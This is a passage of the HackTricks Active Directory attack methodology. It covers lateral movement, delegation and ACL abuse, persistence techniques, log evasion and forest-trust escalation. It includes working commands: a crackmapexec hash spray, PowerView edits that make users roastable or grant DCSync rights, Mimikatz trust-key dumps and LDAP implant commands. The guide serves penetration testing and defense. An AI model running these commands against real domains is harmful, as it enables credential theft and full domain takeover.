    435 Hopefully you have managed to **compromise some local admin** account using [AsRepRoast](/hacktricks/windows-hardening/active-directory-methodology/asreproast), [Password Spraying](/hacktricks/windows-hardening/active-directory-methodology/password-spraying), [Kerberoast](/hacktricks/windows-hardening/active-directory-methodology/kerberoast), [Responder](https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md) including relaying, [EvilSSDP](https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/generic-methodologies-and-resources/pentesting-network/spoofing-ssdp-and-upnp-devices.md), [escalating privileges locally](../windows-local-privilege-escalation/index.html).\
    436 Then, its time to dump all the hashes in memory and locally.\
    437 [**Read this page about different ways to obtain the hashes.**](https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/windows-hardening/active-directory-methodology/broken-reference/README.md)
    438 
    439 ### Pass the Hash
    440 
    441 **Once you have the hash of a user**, you can use it to **impersonate** it.\
    442 You need to use some **tool** that will **perform** the **NTLM authentication using** that **hash**, **or** you could create a new **sessionlogon** and **inject** that **hash** inside the **LSASS**, so when any **NTLM authentication is performed**, that **hash will be used.** The last option is what mimikatz does.\
    443 [**Read this page for more information.**](../ntlm/index.html#pass-the-hash)
    444 
    445 ### Over Pass the Hash/Pass the Key
    446 
    447 This attack aims to **use the user NTLM hash to request Kerberos tickets**, as an alternative to the common Pass The Hash over NTLM protocol. Therefore, this could be especially **useful in networks where NTLM protocol is disabled** and only **Kerberos is allowed** as authentication protocol.
    448 
    449 
    450 [Over Pass The Hash Pass The Key](/hacktricks/windows-hardening/active-directory-methodology/over-pass-the-hash-pass-the-key)
    451 
    452 ### Pass the Ticket
    453 
    454 In the **Pass The Ticket (PTT)** attack method, attackers **steal a user's authentication ticket** instead of their password or hash values. This stolen ticket is then used to **impersonate the user**, gaining unauthorized access to resources and services within a network.
    455 
    456 
    457 [Pass The Ticket](/hacktricks/windows-hardening/active-directory-methodology/pass-the-ticket)
    458 
    459 ### Credentials Reuse
    460 
    461 If you have the **hash** or **password** of a **local administrato**r you should try to **login locally** to other **PCs** with it.
    462 
    463 ```bash
    464 # Local Auth Spray (once you found some local admin pass or hash)
    465 ## --local-auth flag indicate to only try 1 time per machine
    466 crackmapexec smb --local-auth 10.10.10.10/23 -u administrator -H 10298e182387f9cab376ecd08491764a0 | grep +
    467 ```
    468 
    469 > [!WARNING]
    470 > Note that this is quite **noisy** and **LAPS** would **mitigate** it.
    471 
    472 ### MSSQL Abuse & Trusted Links
    473 
    474 If a user has privileges to **access MSSQL instances**, he could be able to use it to **execute commands** in the MSSQL host (if running as SA), **steal** the NetNTLM **hash** or even perform a **relay** **attack**.\
    475 If an MSSQL instance is trusted through a database link by another instance, a user with privileges over the linked database may be able to **use the trust relationship to execute queries on the other instance**. These trusts can be chained and may eventually reach a misconfigured database where the user can execute commands.\
    476 **The links between databases work even across forest trusts.**
    477 
    478 
    479 [Abusing Ad Mssql](/hacktricks/windows-hardening/active-directory-methodology/abusing-ad-mssql)
    480 
    481 ### IT asset/deployment platforms abuse
    482 
    483 Third-party inventory and deployment suites often expose powerful paths to credentials and code execution. See:
    484 
    485 [Sccm Management Point Relay Sql Policy Secrets](/hacktricks/windows-hardening/active-directory-methodology/sccm-management-point-relay-sql-policy-secrets)
    486 
    487 [Lansweeper Security](/hacktricks/windows-hardening/active-directory-methodology/lansweeper-security)
    488 
    489 ### Unconstrained Delegation
    490 
    491 If you find any Computer object with the attribute [ADS_UF_TRUSTED_FOR_DELEGATION](<https://msdn.microsoft.com/en-us/library/aa772300(v=vs.85).aspx>) and you have domain privileges in the computer, you will be able to dump TGTs from memory of every users that logins onto the computer.\
    492 So, if a **Domain Admin logins onto the computer**, you will be able to dump his TGT and impersonate him using [Pass the Ticket](/hacktricks/windows-hardening/active-directory-methodology/pass-the-ticket).\
    493 Thanks to constrained delegation you could even **automatically compromise a Print Server** (hopefully it will be a DC).
    494 
    495 
    496 [Unconstrained Delegation](/hacktricks/windows-hardening/active-directory-methodology/unconstrained-delegation)
    497 
    498 ### Constrained Delegation
    499 
    500 If a user or computer is allowed for "Constrained Delegation" it will be able to **impersonate any user to access some services in a computer**.\
    501 Then, if you **compromise the hash** of this user/computer you will be able to **impersonate any user** (even domain admins) to access some services.
    502 
    503 
    504 [Constrained Delegation](/hacktricks/windows-hardening/active-directory-methodology/constrained-delegation)
    505 
    506 ### Resourced-based Constrain Delegation
    507 
    508 Having **WRITE** privilege on an Active Directory object of a remote computer enables the attainment of code execution with **elevated privileges**:
    509 
    510 
    511 [Resource Based Constrained Delegation](/hacktricks/windows-hardening/active-directory-methodology/resource-based-constrained-delegation)
    512 
    513 ### Permissions/ACLs Abuse
    514 
    515 The compromised user could have some **interesting privileges over some domain objects** that could let you **move** laterally/**escalate** privileges.
    516 
    517 
    518 [Acl Persistence Abuse](/hacktricks/windows-hardening/active-directory-methodology/acl-persistence-abuse/overview)
    519 
    520 ### Printer Spooler service abuse
    521 
    522 Discovering a **Spool service listening** within the domain can be **abused** to **acquire new credentials** and **escalate privileges**.
    523 
    524 
    525 [Printers Spooler Service Abuse](/hacktricks/windows-hardening/active-directory-methodology/printers-spooler-service-abuse)
    526 
    527 ### Third party sessions abuse
    528 
    529 If **other users** **access** the **compromised** machine, it's possible to **gather credentials from memory** and even **inject beacons in their processes** to impersonate them.\
    530 Usually users will access the system via RDP, so here you have how to performa couple of attacks over third party RDP sessions:
    531 
    532 
    533 [Rdp Sessions Abuse](/hacktricks/windows-hardening/active-directory-methodology/rdp-sessions-abuse)
    534 
    535 ### LAPS
    536 
    537 **LAPS** provides a system for managing the **local Administrator password** on domain-joined computers, ensuring it's **randomized**, unique, and frequently **changed**. These passwords are stored in Active Directory and access is controlled through ACLs to authorized users only. With sufficient permissions to access these passwords, pivoting to other computers becomes possible.
    538 
    539 
    540 [Laps](/hacktricks/windows-hardening/active-directory-methodology/laps)
    541 
    542 ### Certificate Theft
    543 
    544 **Gathering certificates** from the compromised machine could be a way to escalate privileges inside the environment:
    545 
    546 
    547 [Certificate Theft](/hacktricks/windows-hardening/active-directory-methodology/ad-certificates/certificate-theft)
    548 
    549 ### Certificate Templates Abuse
    550 
    551 If **vulnerable templates** are configured it's possible to abuse them to escalate privileges:
    552 
    553 
    554 [Domain Escalation](/hacktricks/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation)
    555 
    556 ## Post-exploitation with high privilege account
    557 
    558 ### Dumping Domain Credentials
    559 
    560 Once you get **Domain Admin** or even better **Enterprise Admin** privileges, you can **dump** the **domain database**: _ntds.dit_.
    561 
    562 [**More information about DCSync attack can be found here**](/hacktricks/windows-hardening/active-directory-methodology/dcsync).
    563 
    564 [**More information about how to steal the NTDS.dit can be found here**](https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/windows-hardening/active-directory-methodology/broken-reference/README.md)
    565 
    566 ### Privesc as Persistence
    567 
    568 Some of the techniques discussed before can be used for persistence.\
    569 For example you could:
    570 
    571 - Make users vulnerable to [**Kerberoast**](/hacktricks/windows-hardening/active-directory-methodology/kerberoast)
    572 
    573   ```bash
    574   Set-DomainObject -Identity <username> -Set @{serviceprincipalname="fake/NOTHING"}r
    575   ```
    576 
    577 - Make users vulnerable to [**ASREPRoast**](/hacktricks/windows-hardening/active-directory-methodology/asreproast)
    578 
    579   ```bash
    580   Set-DomainObject -Identity <username> -XOR @{UserAccountControl=4194304}
    581   ```
    582 
    583 - Grant [**DCSync**](#dcsync) privileges to a user
    584 
    585   ```bash
    586   Add-DomainObjectAcl -TargetIdentity "DC=SUB,DC=DOMAIN,DC=LOCAL" -PrincipalIdentity bfarmer -Rights DCSync
    587   ```
    588 
    589 ### Silver Ticket
    590 
    591 The **Silver Ticket attack** creates a **legitimate Ticket Granting Service (TGS) ticket** for a specific service by using the **NTLM hash** (for instance, the **hash of the PC account**). This method is employed to **access the service privileges**.
    592 
    593 
    594 [Silver Ticket](/hacktricks/windows-hardening/active-directory-methodology/silver-ticket)
    595 
    596 ### Golden Ticket
    597 
    598 A **Golden Ticket attack** involves an attacker gaining access to the **NTLM hash of the krbtgt account** in an Active Directory (AD) environment. This account is special because it's used to sign all **Ticket Granting Tickets (TGTs)**, which are essential for authenticating within the AD network.
    599 
    600 Once the attacker obtains this hash, they can create **TGTs** for any account they choose (Silver ticket attack).
    601 
    602 
    603 [Golden Ticket](/hacktricks/windows-hardening/active-directory-methodology/golden-ticket)
    604 
    605 ### Diamond Ticket
    606 
    607 These are like golden tickets forged in a way that **bypasses common golden tickets detection mechanisms.**
    608 
    609 
    610 [Diamond Ticket](/hacktricks/windows-hardening/active-directory-methodology/diamond-ticket)
    611 
    612 ### **Certificates Account Persistence**
    613 
    614 **Having certificates of an account or being able to request them** is a very good way to be able to persist in the users account (even if he changes the password):
    615 
    616 
    617 [Account Persistence](/hacktricks/windows-hardening/active-directory-methodology/ad-certificates/account-persistence)
    618 
    619 ### **Certificates Domain Persistence**
    620 
    621 **Using certificates is also possible to persist with high privileges inside the domain:**
    622 
    623 
    624 [Domain Persistence](/hacktricks/windows-hardening/active-directory-methodology/ad-certificates/domain-persistence)
    625 
    626 ### AdminSDHolder Group
    627 
    628 The **AdminSDHolder** object in Active Directory ensures the security of **privileged groups** (like Domain Admins and Enterprise Admins) by applying a standard **Access Control List (ACL)** across these groups to prevent unauthorized changes. However, this feature can be exploited; if an attacker modifies the AdminSDHolder's ACL to give full access to a regular user, that user gains extensive control over all privileged groups. This security measure, meant to protect, can thus backfire, allowing unwarranted access unless closely monitored.
    629 
    630 [**More information about AdminDSHolder Group here.**](/hacktricks/windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges#adminsdholder-group)
    631 
    632 ### DSRM Credentials
    633 
    634 Inside every **Domain Controller (DC)**, a **local administrator** account exists. By obtaining admin rights on such a machine, the local Administrator hash can be extracted using **mimikatz**. Following this, a registry modification is necessary to **enable the use of this password**, allowing for remote access to the local Administrator account.
    635 
    636 
    637 [Dsrm Credentials](/hacktricks/windows-hardening/active-directory-methodology/dsrm-credentials)
    638 
    639 ### ACL Persistence
    640 
    641 You could **give** some **special permissions** to a **user** over some specific domain objects that will let the user **escalate privileges in the future**.
    642 
    643 
    644 [Acl Persistence Abuse](/hacktricks/windows-hardening/active-directory-methodology/acl-persistence-abuse/overview)
    645 
    646 ### Security Descriptors
    647 
    648 The **security descriptors** are used to **store** the **permissions** an **object** have **over** an **object**. If you can just **make** a **little change** in the **security descriptor** of an object, you can obtain very interesting privileges over that object without needing to be member of a privileged group.
    649 
    650 
    651 [Security Descriptors](/hacktricks/windows-hardening/active-directory-methodology/security-descriptors)
    652 
    653 ### Dynamic Objects Anti-Forensics / Evasion
    654 
    655 Abuse the `dynamicObject` auxiliary class to create short-lived principals/GPOs/DNS records with `entryTTL`/`msDS-Entry-Time-To-Die`; they self-delete without tombstones, erasing LDAP evidence while leaving orphan SIDs, broken `gPLink` references, or cached DNS responses (e.g., AdminSDHolder ACE pollution or malicious `gPCFileSysPath`/AD-integrated DNS redirects).
    656 
    657 [Ad Dynamic Objects Anti Forensics](/hacktricks/windows-hardening/active-directory-methodology/ad-dynamic-objects-anti-forensics)
    658 
    659 ### Skeleton Key
    660 
    661 Alter **LSASS** in memory to establish a **universal password**, granting access to all domain accounts.
    662 
    663 
    664 [Skeleton Key](/hacktricks/windows-hardening/active-directory-methodology/skeleton-key)
    665 
    666 ### Custom SSP
    667 
    668 [Learn what is a SSP (Security Support Provider) here.](../authentication-credentials-uac-and-efs/index.html#security-support-provider-interface-sspi)\
    669 You can create you **own SSP** to **capture** in **clear text** the **credentials** used to access the machine.
    670 
    671 
    672 [Custom Ssp](/hacktricks/windows-hardening/active-directory-methodology/custom-ssp)
    673 
    674 ### DCShadow
    675 
    676 It registers a **new Domain Controller** in the AD and uses it to **push attributes** (SIDHistory, SPNs...) on specified objects **without** leaving any **logs** regarding the **modifications**. You **need DA** privileges and be inside the **root domain**.\
    677 Note that if you use wrong data, pretty ugly logs will appear.
    678 
    679 
    680 [Dcshadow](/hacktricks/windows-hardening/active-directory-methodology/dcshadow)
    681 
    682 ### LAPS Persistence
    683 
    684 Previously we have discussed about how to escalate privileges if you have **enough permission to read LAPS passwords**. However, these passwords can also be used to **maintain persistence**.\
    685 Check:
    686 
    687 
    688 [Laps](/hacktricks/windows-hardening/active-directory-methodology/laps)
    689 
    690 ## Forest Privilege Escalation - Domain Trusts
    691 
    692 Microsoft views the **Forest** as the security boundary. This implies that **compromising a single domain could potentially lead to the entire Forest being compromised**.<sup>[[1]](#references)</sup>
    693 
    694 ### Basic Information
    695 
    696 A [**domain trust**](<http://technet.microsoft.com/en-us/library/cc759554(v=ws.10).aspx>) is a security mechanism that enables a user from one **domain** to access resources in another **domain**. It essentially creates a linkage between the authentication systems of the two domains, allowing authentication verifications to flow seamlessly. When domains set up a trust, they exchange and retain specific **keys** within their **Domain Controllers (DCs)**, which are crucial to the trust's integrity.
    697 
    698 In a typical scenario, if a user intends to access a service in a **trusted domain**, they must first request a special ticket known as an **inter-realm TGT** from their own domain's DC. This TGT is encrypted with a shared **key** that both domains have agreed upon. The user then presents this TGT to the **DC of the trusted domain** to get a service ticket (**TGS**). Upon successful validation of the inter-realm TGT by the trusted domain's DC, it issues a TGS, granting the user access to the service.
    699 
    700 **Steps**:
    701 
    702 1. A **client computer** in **Domain 1** starts the process by using its **NTLM hash** to request a **Ticket Granting Ticket (TGT)** from its **Domain Controller (DC1)**.
    703 2. DC1 issues a new TGT if the client is authenticated successfully.
    704 3. The client then requests an **inter-realm TGT** from DC1, which is needed to access resources in **Domain 2**.
    705 4. The inter-realm TGT is encrypted with a **trust key** shared between DC1 and DC2 as part of the two-way domain trust.
    706 5. The client takes the inter-realm TGT to **Domain 2's Domain Controller (DC2)**.
    707 6. DC2 verifies the inter-realm TGT using its shared trust key and, if valid, issues a **Ticket Granting Service (TGS)** for the server in Domain 2 the client wants to access.
    708 7. Finally, the client presents this TGS to the server, which is encrypted with the server’s account hash, to get access to the service in Domain 2.
    709 
    710 ### Different trusts
    711 
    712 It's important to notice that **a trust can be 1 way or 2 ways**. In the 2 ways options, both domains will trust each other, but in the **1 way** trust relation one of the domains will be the **trusted** and the other the **trusting** domain. In the last case, **you will only be able to access resources inside the trusting domain from the trusted one**.
    713 
    714 If Domain A trusts Domain B, A is the trusting domain and B ins the trusted one. Moreover, in **Domain A**, this would be an **Outbound trust**; and in **Domain B**, this would be an **Inbound trust**.
    715 
    716 **Different trusting relationships**
    717 
    718 - **Parent-Child Trusts**: This is a common setup within the same forest, where a child domain automatically has a two-way transitive trust with its parent domain. Essentially, this means that authentication requests can flow seamlessly between the parent and the child.
    719 - **Cross-link Trusts**: Referred to as "shortcut trusts," these are established between child domains to expedite referral processes. In complex forests, authentication referrals typically have to travel up to the forest root and then down to the target domain. By creating cross-links, the journey is shortened, which is especially beneficial in geographically dispersed environments.
    720 - **External Trusts**: These are set up between different, unrelated domains and are non-transitive by nature. According to [Microsoft's documentation](<https://technet.microsoft.com/en-us/library/cc773178(v=ws.10).aspx>), external trusts are useful for accessing resources in a domain outside of the current forest that isn't connected by a forest trust. Security is bolstered through SID filtering with external trusts.
    721 - **Tree-root Trusts**: These trusts are automatically established between the forest root domain and a newly added tree root. While not commonly encountered, tree-root trusts are important for adding new domain trees to a forest, enabling them to maintain a unique domain name and ensuring two-way transitivity. More information can be found in [Microsoft's guide](<https://technet.microsoft.com/en-us/library/cc773178(v=ws.10).aspx>).
    722 - **Forest Trusts**: This type of trust is a two-way transitive trust between two forest root domains, also enforcing SID filtering to enhance security measures.
    723 - **MIT Trusts**: These trusts are established with non-Windows, [RFC4120-compliant](https://tools.ietf.org/html/rfc4120) Kerberos domains. MIT trusts are a bit more specialized and cater to environments requiring integration with Kerberos-based systems outside the Windows ecosystem.
    724 
    725 #### Other differences in **trusting relationships**
    726 
    727 - A trust relationship can also be **transitive** (A trust B, B trust C, then A trust C) or **non-transitive**.
    728 - A trust relationship can be set up as **bidirectional trust** (both trust each other) or as **one-way trust** (only one of them trust the other).
    729 
    730 ### Attack Path
    731 
    732 1. **Enumerate** the trusting relationships
    733 2. Check if any **security principal** (user/group/computer) has **access** to resources of the **other domain**, maybe by ACE entries or by being in groups of the other domain. Look for **relationships across domains** (the trust was created for this probably).
    734    1. kerberoast in this case could be another option.
    735 3. **Compromise** the **accounts** which can **pivot** through domains.
    736 
    737 Attackers with could access to resources in another domain through three primary mechanisms:
    738 
    739 - **Local Group Membership**: Principals might be added to local groups on machines, such as the “Administrators” group on a server, granting them significant control over that machine.
    740 - **Foreign Domain Group Membership**: Principals can also be members of groups within the foreign domain. However, the effectiveness of this method depends on the nature of the trust and the scope of the group.
    741 - **Access Control Lists (ACLs)**: Principals might be specified in an **ACL**, particularly as entities in **ACEs** within a **DACL**, providing them access to specific resources. For those looking to dive deeper into the mechanics of ACLs, DACLs, and ACEs, the whitepaper titled “[An ACE Up The Sleeve](https://specterops.io/assets/resources/an_ace_up_the_sleeve.pdf)” is an invaluable resource.<sup>[[17]](#references)</sup>
    742 
    743 ### Find external users/groups with permissions
    744 
    745 You can check **`CN=<user_SID>,CN=ForeignSecurityPrincipals,DC=domain,DC=com`** to find foreign security principals in the domain. These will be user/group from **an external domain/forest**.
    746 
    747 You could check this in **Bloodhound** or using powerview:
    748 
    749 ```powershell
    750 # Get users that are i groups outside of the current domain
    751 Get-DomainForeignUser
    752 
    753 # Get groups inside a domain with users our
    754 Get-DomainForeignGroupMember
    755 ```
    756 
    757 ### Child-to-Parent forest privilege escalation
    758 
    759 ```bash
    760 # From PowerView
    761 Get-DomainTrust
    762 
    763 SourceName      : sub.domain.local    --> current domain
    764 TargetName      : domain.local        --> foreign domain
    765 TrustType       : WINDOWS_ACTIVE_DIRECTORY
    766 TrustAttributes : WITHIN_FOREST       --> WITHIN_FOREST: Both in the same forest
    767 TrustDirection  : Bidirectional       --> Trust direction (2ways in this case)
    768 WhenCreated     : 2/19/2021 1:28:00 PM
    769 WhenChanged     : 2/19/2021 1:28:00 PM
    770 ```
    771 
    772 Other ways to enumerate domain trusts:
    773 
    774 ```bash
    775 # Get DCs
    776 nltest /dsgetdc:<DOMAIN>
    777 
    778 # Get all domain trusts
    779 nltest /domain_trusts /all_trusts /v
    780 
    781 # Get all trust of a domain
    782 nltest /dclist:sub.domain.local
    783 nltest /server:dc.sub.domain.local /domain_trusts /all_trusts
    784 ```
    785 
    786 > [!WARNING]
    787 > There are **2 trusted keys**, one for _Child --> Parent_ and another one for _Parent_ --> _Child_.\
    788 > You can the one used by the current domain them with:
    789 >
    790 > ```bash
    791 > Invoke-Mimikatz -Command '"lsadump::trust /patch"' -ComputerName dc.my.domain.local
    792 > Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\mcorp$"'
    793 > ```
    794 
    795 #### SID-History Injection
    796 
    797 Escalate as Enterprise admin to the child/parent domain abusing the trust with SID-History injection:
    798 
    799 
    800 [Sid History Injection](/hacktricks/windows-hardening/active-directory-methodology/sid-history-injection)
    801 
    802 #### Exploit writeable Configuration NC
    803 
    804 Understanding how the Configuration Naming Context (NC) can be exploited is crucial. The Configuration NC serves as a central repository for configuration data across a forest in Active Directory (AD) environments. This data is replicated to every Domain Controller (DC) within the forest, with writable DCs maintaining a writable copy of the Configuration NC. To exploit this, one must have **SYSTEM privileges on a DC**, preferably a child DC.
    805 
    806 **Link GPO to root DC site**
    807 
    808 The Configuration NC's Sites container includes information about all domain-joined computers' sites within the AD forest. By operating with SYSTEM privileges on any DC, attackers can link GPOs to the root DC sites. This action potentially compromises the root domain by manipulating policies applied to these sites.
    809 
    810 For in-depth information, one might explore research on [Bypassing SID Filtering](https://itm8.com/articles/sid-filter-as-security-boundary-between-domains-part-4).<sup>[[12]](#references)</sup>
    811 
    812 **Compromise any gMSA in the forest**
    813 
    814 An attack vector involves targeting privileged gMSAs within the domain. The KDS Root key, essential for calculating gMSAs' passwords, is stored within the Configuration NC. With SYSTEM privileges on any DC, it's possible to access the KDS Root key and compute the passwords for any gMSA across the forest.
    815 
    816 Detailed analysis and step-by-step guidance can be found in:
    817 
    818 
    819 [Golden Dmsa Gmsa](/hacktricks/windows-hardening/active-directory-methodology/golden-dmsa-gmsa)
    820 
    821 Complementary delegated MSA attack (BadSuccessor – abusing migration attributes):
    822 
    823 
    824 [Badsuccessor Dmsa Migration Abuse](/hacktricks/windows-hardening/active-directory-methodology/badsuccessor-dmsa-migration-abuse)
    825 
    826 Additional external research: [Golden gMSA Trust Attacks](https://itm8.com/articles/sid-filter-as-security-boundary-between-domains-part-5).<sup>[[13]](#references)</sup>
    827 
    828 **Schema change attack**
    829 
    830 This method requires patience, waiting for the creation of new privileged AD objects. With SYSTEM privileges, an attacker can modify the AD Schema to grant any user complete control over all classes. This could lead to unauthorized access and control over newly created AD objects.
    831 
    832 Further reading is available on [Schema Change Trust Attacks](https://itm8.com/articles/sid-filter-as-security-boundary-between-domains-part-6).<sup>[[14]](#references)</sup>
    833 
    834 **From DA to EA with ADCS ESC5**
    835 
    836 The ADCS ESC5 vulnerability targets control over Public Key Infrastructure (PKI) objects to create a certificate template that enables authentication as any user within the forest. As PKI objects reside in the Configuration NC, compromising a writable child DC enables the execution of ESC5 attacks.
    837 
    838 More details on this can be read in [From DA to EA with ESC5](https://specterops.io/blog/2023/05/16/from-da-to-ea-with-esc5/).<sup>[[15]](#references)</sup> In scenarios lacking ADCS, the attacker has the capability to set up the necessary components, as discussed in [Escalating from Child Domain Admins to Enterprise Admins](https://www.pkisolutions.com/escalating-from-child-domains-admins-to-enterprise-admins-in-5-minutes-by-abusing-ad-cs-a-follow-up/).<sup>[[16]](#references)</sup>
    839 
    840 ### External Forest Domain - One-Way (Inbound) or bidirectional
    841 
    842 ```bash
    843 Get-DomainTrust
    844 SourceName      : a.domain.local   --> Current domain
    845 TargetName      : domain.external  --> Destination domain
    846 TrustType       : WINDOWS-ACTIVE_DIRECTORY
    847 TrustAttributes :
    848 TrustDirection  : Inbound          --> Inboud trust
    849 WhenCreated     : 2/19/2021 10:50:56 PM
    850 WhenChanged     : 2/19/2021 10:50:56 PM
    851 ```
    852 
    853 In this scenario **your domain is trusted** by an external one giving you **undetermined permissions** over it. You will need to find **which principals of your domain have which access over the external domain** and then try to exploit it:
    854 
    855 
    856 [External Forest Domain Oneway Inbound](/hacktricks/windows-hardening/active-directory-methodology/external-forest-domain-oneway-inbound)
    857 
    858 ### External Forest Domain - One-Way (Outbound)
    859 
    860 ```bash
    861 Get-DomainTrust -Domain current.local
    862 
    863 SourceName      : current.local   --> Current domain
    864 TargetName      : external.local  --> Destination domain
    865 TrustType       : WINDOWS_ACTIVE_DIRECTORY
    866 TrustAttributes : FOREST_TRANSITIVE
    867 TrustDirection  : Outbound        --> Outbound trust
    868 WhenCreated     : 2/19/2021 10:15:24 PM
    869 WhenChanged     : 2/19/2021 10:15:24 PM
    870 ```
    871 
    872 In this scenario **your domain** is **trusting** some **privileges** to principal from a **different domains**.
    873 
    874 However, when a **domain is trusted** by the trusting domain, the trusted domain **creates a user** with a **predictable name** that uses as **password the trusted password**. Which means that it's possible to **access a user from the trusting domain to get inside the trusted one** to enumerate it and try to escalate more privileges:
    875 
    876 
    877 [External Forest Domain One Way Outbound](/hacktricks/windows-hardening/active-directory-methodology/external-forest-domain-one-way-outbound)
    878 
    879 Another way to compromise the trusted domain is to find a [**SQL trusted link**](/hacktricks/windows-hardening/active-directory-methodology/abusing-ad-mssql#mssql-trusted-links) created in the **opposite direction** of the domain trust (which isn't very common).
    880 
    881 Another way to compromise the trusted domain is to wait in a machine where a **user from the trusted domain can access** to login via **RDP**. Then, the attacker could inject code in the RDP session process and **access the origin domain of the victim** from there.\
    882 Moreover, if the **victim mounted his hard drive**, from the **RDP session** process the attacker could store **backdoors** in the **startup folder of the hard drive**. This technique is called **RDPInception.**
    883 
    884 
    885 [Rdp Sessions Abuse](/hacktricks/windows-hardening/active-directory-methodology/rdp-sessions-abuse)
    886 
    887 ### Domain trust abuse mitigation
    888 
    889 ### **SID Filtering:**
    890 
    891 - The risk of attacks leveraging the SID history attribute across forest trusts is mitigated by SID Filtering, which is activated by default on all inter-forest trusts. This is underpinned by the assumption that intra-forest trusts are secure, considering the forest, rather than the domain, as the security boundary as per Microsoft's stance.
    892 - However, there's a catch: SID filtering might disrupt applications and user access, leading to its occasional deactivation.
    893 
    894 ### **Selective Authentication:**
    895 
    896 - For inter-forest trusts, employing Selective Authentication ensures that users from the two forests are not automatically authenticated. Instead, explicit permissions are required for users to access domains and servers within the trusting domain or forest.
    897 - It's important to note that these measures do not safeguard against the exploitation of the writable Configuration Naming Context (NC) or attacks on the trust account.
    898 
    899 [**More information about domain trusts in ired.team.**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/child-domain-da-to-ea-in-parent-domain)<sup>[[3]](#references)</sup>
    900 
    901 ## LDAP-based AD Abuse from On-Host Implants
    902 
    903 The [LDAP BOF Collection](https://github.com/P0142/LDAP-Bof-Collection) re-implements bloodyAD-style LDAP primitives as x64 Beacon Object Files that run entirely inside an on-host implant (e.g., Adaptix C2). Operators compile the pack with `git clone https://github.com/P0142/ldap-bof-collection.git && cd ldap-bof-collection && make`, load `ldap.axs`, and then call `ldap <subcommand>` from the beacon. All traffic rides the current logon security context over LDAP (389) with signing/sealing or LDAPS (636) with auto certificate trust, so no socks proxies or disk artifacts are required.<sup>[[4]](#references)</sup>
    904 
    905 ### Implant-side LDAP enumeration
    906 
    907 - `get-users`, `get-computers`, `get-groups`, `get-usergroups`, and `get-groupmembers` resolve short names/OU paths into full DNs and dump the corresponding objects.
    908 - `get-object`, `get-attribute`, and `get-domaininfo` pull arbitrary attributes (including security descriptors) plus the forest/domain metadata from `rootDSE`.
    909 - `get-uac`, `get-spn`, `get-delegation`, and `get-rbcd` expose roasting candidates, delegation settings, and existing [Resource-based Constrained Delegation](/hacktricks/windows-hardening/active-directory-methodology/resource-based-constrained-delegation) descriptors directly from LDAP.
    910 - `get-acl` and `get-writable --detailed` parse the DACL to list trustees, rights (GenericAll/WriteDACL/WriteOwner/attribute writes), and inheritance, giving immediate targets for ACL privilege escalation.
    911 
    912 ```powershell
    913 ldap get-users --ldaps
    914 ldap get-computers -ou "OU=Servers,DC=corp,DC=local"
    915 ldap get-writable --detailed
    916 ldap get-acl "CN=Tier0,OU=Admins,DC=corp,DC=local"
    917 ```
    918 
    919 ### LDAP write primitives for escalation & persistence
    920 
    921 - Object creation BOFs (`add-user`, `add-computer`, `add-group`, `add-ou`) let the operator stage new principals or machine accounts wherever OU rights exist. `add-groupmember`, `set-password`, `add-attribute`, and `set-attribute` directly hijack targets once write-property rights are found.
    922 - ACL-focused commands such as `add-ace`, `set-owner`, `add-genericall`, `add-genericwrite`, and `add-dcsync` translate WriteDACL/WriteOwner on any AD object into password resets, group membership control, or DCSync replication privileges without leaving PowerShell/ADSI artifacts. `remove-*` counterparts clean up injected ACEs.
    923 
    924 ### Delegation, roasting, and Kerberos abuse
    925 
    926 - `add-spn`/`set-spn` instantly make a compromised user Kerberoastable; `add-asreproastable` (UAC toggle) marks it for AS-REP roasting without touching the password.
    927 - Delegation macros (`add-delegation`, `set-delegation`, `add-constrained`, `add-unconstrained`, `add-rbcd`) rewrite `msDS-AllowedToDelegateTo`, UAC flags, or `msDS-AllowedToActOnBehalfOfOtherIdentity` from the beacon, enabling constrained/unconstrained/RBCD attack paths and eliminating the need for remote PowerShell or RSAT.
    928 
    929 ### sidHistory injection, OU relocation, and attack surface shaping
    930 
    931 - `add-sidhistory` injects privileged SIDs into a controlled principal’s SID history (see [SID-History Injection](/hacktricks/windows-hardening/active-directory-methodology/sid-history-injection)), providing stealthy access inheritance fully over LDAP/LDAPS.
    932 - `move-object` changes the DN/OU of computers or users, letting an attacker drag assets into OUs where delegated rights already exist before abusing `set-password`, `add-groupmember`, or `add-spn`.
    933 - Tightly scoped removal commands (`remove-attribute`, `remove-delegation`, `remove-rbcd`, `remove-uac`, `remove-groupmember`, etc.) allow rapid rollback after the operator harvests credentials or persistence, minimizing telemetry.
    934 
    935 ## AD -> Azure & Azure -> AD
    936 
    937 
    938 [Index.Html](https%3A//cloud.hacktricks.wiki/en/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/index.html)
    939 
    940 ## Some General Defenses
    941 
    942 [**Learn more about how to protect credentials here.**](/hacktricks/windows-hardening/stealing-credentials/credentials-protections)
    943 
    944 ### **Defensive Measures for Credential Protection**
    945 
    946 - **Domain Admins Restrictions**: It is recommended that Domain Admins should only be allowed to login to Domain Controllers, avoiding their use on other hosts.
    947 - **Service Account Privileges**: Services should not be run with Domain Admin (DA) privileges to maintain security.
    948 - **Temporal Privilege Limitation**: For tasks requiring DA privileges, their duration should be limited. This can be achieved by: `Add-ADGroupMember -Identity ‘Domain Admins’ -Members newDA -MemberTimeToLive (New-TimeSpan -Minutes 20)`
    949 - **LDAP relay mitigation**: Audit Event IDs 2889/3074/3075 and then enforce LDAP signing plus LDAPS channel binding on DCs/clients to block LDAP MITM/relay attempts.
    950 
    951 [Ldap Signing And Channel Binding](/hacktricks/windows-hardening/active-directory-methodology/ldap-signing-and-channel-binding)
    952 
    953 ### Protocol-level fingerprinting of Impacket activity
    954 
